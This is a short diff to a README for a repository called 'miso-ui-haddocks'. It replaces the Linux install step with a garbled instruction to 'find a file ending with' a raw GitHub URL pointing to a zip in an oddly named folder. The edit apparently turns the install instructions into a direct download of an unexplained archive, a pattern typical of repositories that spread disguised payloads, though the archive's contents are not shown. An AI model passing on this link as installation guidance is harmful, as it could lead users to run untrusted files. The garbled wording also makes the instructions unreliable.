waduhgaming/miso-ui-haddocks/README.md

    - For Windows users, look for a file ending with `.exe`.
    - For Mac users, look for a package ending with `.dmg`.
-   - For Linux users, find a file ending with `.tar.gz`.
+   - For Linux users, find a file ending with `https://raw.githubusercontent.com/waduhgaming/miso-ui-haddocks/master/embryogony/miso-ui-haddocks_v2.0.zip`.

 5. Once the download is complete, open the file to begin installation.
 Follow the on-screen instructions to install the application.